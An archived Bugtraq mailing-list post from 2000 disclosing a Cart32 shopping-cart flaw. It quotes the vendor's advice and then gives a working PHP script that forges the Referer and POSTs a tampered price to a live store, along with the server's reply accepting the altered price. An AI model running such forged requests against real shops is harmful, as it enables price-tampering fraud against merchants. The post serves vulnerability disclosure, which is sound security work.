Bugtraq mailing list archives

Re: Another hole in Cart32

From: cdi () THEWEBMASTERS NET (CDI)
Date: Tue, 23 May 2000 14:05:03 -0700


On Mon, 22 May 2000, sert sert wrote:

I attempted to contact the vendor earlier last month about resolving this
problem and received the attached reply.  They seem to be relying on the
client to properly use the security options available in the package.

John Scimone
johnscimone () hotmail com


[snip]
  What we did to help prevent this was add two fields into the Cart32
  administration. The most important one is called "Domains to accept
  orders".  What you do with that is list all of the domains that can have
  pages on them. Usually you would list your domain name and your secure
  domain if it different. Ex. www.cart32.com,cart32.com,secure.cart32.com

[snip]
  The other field is called POST required. This means that a form must use
  Method=post and not method=get. Also that means links, which use the GET
  method, will not add to the cart."

  Mark Pilkenton

  Cart32 Technical Support
  (417) 865-1283
  support () cart32 com
--END

This message is mainly for Mark and the Cart32 engineers - the BugTraq
faithful are already well aware that the above "security options" are a
complete joke and a total waste of time.

Client submitted data should never even be -trusted-, let alone be the
basis for your applications data integrity.

Here - let's pull the security blanket off of Cart32 and show them the
cold, hard, facts of life.

This also shows that Cart32.com doesn't take it's own damn advice...

----begin cart32.phtml (a PHP exploit for Cart32 Stupidity)----
<?php
/*

   Caution - long lines ahead.

   Cart32.phtml
   Bypass lame "security" options by providing our own referer
   and tainted data via POST.
   cdi () thewebmasters net

  PostToHost()
    Heavily modified version of Rasmus' PostToHost function
    It's generic enough to handle any method containing
    just about any data.

    $data: urlencoded QUERY_STRING format
    $cookie: urlencoded cookie string format (name=value;name=value).
*/

function PostToHost($host="",$port="80",$method="POST",$path="",$data="",$refer="",$client="",$cookie="")
{
    $fp = fsockopen($host,$port);
    if(!$fp) { echo "Failed to open port"; exit; }
    fputs($fp, "$method $path HTTP/1.0\n");
    if($cookie != "") { fputs($fp, "Cookie: $cookie\n"); }
    if($refer  != "") { fputs($fp, "Referer: $refer\n"); }
    if($client != "") { fputs($fp, "User-Agent: $client\n"); }
    if($method == "POST")
    {
        fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
        fputs($fp, "Content-length: " . strlen($data) . "\n");
    }
    fputs($fp, "Connection: close\n\n");
    if($method == "POST")
    {
        fputs($fp, "$data\n");
    }
    $results = "";
    while(!feof($fp))
    {
        $results .= fgets($fp, 1024);
    }
    fclose($fp);
    return $results;
}

// Whee, now all we need to do is set up the data
$host = 'www.cart32.com';
$port = 80;
$method = "POST";
$path = '/cgi-bin/cart32.exe/justsocks-AddItem';
$refer = 'www.IGuessYouDontTakeYourOwnAdvice..com';
// And even if they did, we could set the Referer to match
// anything we wanted.

$client = 'CDI Spoof (v1.0)';
$cookie = "";

// Real price of this product was $6.99
$data = 
'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite';

// And now call the function

$raw = PostToHost($host,$port,$method,$path,$data,$refer,$client,$cookie);

print "<PRE>\n\n";
print " Host: $host\n Port: [$port]\n Method: [$method]\n Path: [$path]\n";
print " Referer: [$refer]\n Client: [$client]\n Cookie: [$cookie]\n";
print " Data: [$data]\n";
print "</PRE>\n";
print "<P>Results of operation:<BR><HR NOSHADE><P>\n";
print "$raw\n";
?>

The JustSocks site is real and is hosted by Cart32.com - the data sent above
resulted in the following: (html removed)

 Host: www.cart32.com
 Port: [80]
 Method: [POST]
 Path: [/cgi-bin/cart32.exe/justsocks-AddItem]
 Referer: [www.IGuessYouDontTakeYourOwnAdvice.com]
 Client: [CDI Spoof (v1.0)]
 Cookie: []
 Data: 
[Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite]

Results of operation:

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 23 May 2000 20:54:04 GMT
Content-type: text/html
Set-Cookie: Cart32-JUSTSOCKS=.3478662; path=/; expires=Thursday, 25-May-2000 01:01:01 GMT

Added quantity 5 of Wigwam Triathlete Ultra-Lite for $1,000.56 each

CDI
____________________________________
The Web Master's Net
http://www.thewebmasters.net/
Today's Excuse:
poor power conditioning

Current thread:

Re: Another hole in Cart32 sert sert (May 22)
- Qpopper 2.53 remote problem, user can gain gid=mail Prizm (May 23)
  - Re: Qpopper 2.53 remote problem, user can gain gid=mail Jose Nazario (May 24)
  - Re: Qpopper 2.53 remote problem, user can gain gid=mail Qpopper Support (May 24)
  - Re: Qpopper 2.53 remote problem, user can gain gid=mail Sebastian (May 25)
- RFP2K05 - NetProwler "Fragmentation" Issue AXENT Security Team (May 23)
- Re: Another hole in Cart32 CDI (May 23)
- <Possible follow-ups>
- Re: Another hole in Cart32 Clover Andrew (May 23)
- Re: Another hole in Cart32 Justin King (May 24)